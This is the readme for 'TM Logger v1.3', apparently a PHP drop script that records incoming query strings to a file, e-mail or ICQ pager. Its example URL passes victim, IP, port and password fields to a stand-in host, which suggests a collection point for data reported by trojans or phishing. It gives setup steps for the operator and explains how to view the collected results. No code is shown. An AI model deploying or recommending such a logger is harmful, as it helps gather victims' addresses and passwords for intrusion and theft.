TM Logger v1.3

TM Logger is a simple PHP script that writes the query string to a file, E-Mail or ICQ Pager.

TM Logger works like CGI logger scripts, but it's PHP.

 

Usage:

log.php?op=0<---------Logger option here

Logger Options:

0 >> Log to File  Logs to the file view.php
1 >> Send E-Mail with log in Message          Sends an E-Mail to the address in the script
2 >> Log and send Mail                Sends an E-Mail and Logs to view.php
3 >> Log and send ICQ Pager        Logs and sends an ICQ Pager to the UIN in the script
4 >> Send ICQ Pager      Sends an ICQ Pager to the UIN

Things to do before uploading:

Put your E-Mail address in

Put your ICQ UIN in, If you don't have icq don't use this option

 

To test the script load it to your Host, Your host must support PHP,

and in IE navigator bar, type the script location and query string

eg, http://www.yourhost.com/log.php?op=0&vic=*VIC*&ip=*IP*&port=*PORT*&pass=*PASS*

To view the results goto http://www.yourhost.com/view.php